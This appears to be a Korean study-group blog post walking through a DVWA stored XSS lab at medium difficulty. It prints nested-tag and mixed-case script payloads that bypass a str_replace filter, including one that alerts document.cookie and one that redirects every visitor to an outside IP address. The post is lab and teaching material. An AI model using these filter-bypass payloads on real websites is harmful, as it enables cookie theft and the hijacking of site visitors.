[ 실습 목표 ]
Redirect everyone to a web page of your choosing.
내가 선택한 웹 페이지로 모든 사람들을 리다이렉트 시키는 것이 실습 목표이다.
[ 실습 화면 ]
- 게시글을 올리는 폼이다.
- 폼의 길이를 늘리고 스크립트 태그를 이용해서 필자의 서버에 리다이렉트 시켜보았다.
- 아마 안될 것이다. low 레벨에서 이런 식으로 리다이렉트 시켰기 때문이다.
- 스크립트 태그만 사라져서 업로드 된 것을 볼 수 있다.
- 스크립트 태그가 필터링 된 것 같은데 소스 코드를 확인해보자.
- 스크립트 태그가 빈 문자열로 치환되는 것을 알 수 있다.
- 이것도 앞선 공격처럼 코드를 작성해보자!
<scrip<script>t>alert(document.cookie);</scrip<script>t>
- 여기서도 그냥 필터링이 되어버린다.
- 다시 소스코드를 봐보니 str_replace 는 Name 부분에서 발생한다.
- Name 부분에 동일한 코드를 삽입해보았다.
- 성공적으로 실행되었다.
<sCriPt>alert(document.cookie);</sCriPt>
- 대소문자를 섞어서 태그를 입력해보았다.
- 성공적으로 작동하는 것을 볼 수 있다.
- 이제 필자의 사이트로 리다이렉트 시켜보자!
<scrip<script>t>location.href="http://117.16.17.186:9879";</scrip<script>t>
- 성공적으로 필자의 사이트로 리다이렉트가 되는 것을 볼 수 있다.
'TeamH4C' 카테고리의 다른 글
[빡공팟 5기] W6 : DVWA 실습 - JavaScript (medium) (0) | 2022.10.30 |
---|---|
[빡공팟 5기] W6 : DVWA 실습 - Content Security Policy (CSP) Bypass (medium) (0) | 2022.10.30 |
[빡공팟 5기] W6 : DVWA 실습 - Reflected Cross Site Scripting (medium) (0) | 2022.10.30 |
[빡공팟 5기] W6 : DVWA 실습 - DOM based Cross-Site-Scripting (medium) (0) | 2022.10.30 |
[빡공팟 5기] W6 : DVWA 실습 - Weak Session IDs (medium) (0) | 2022.10.30 |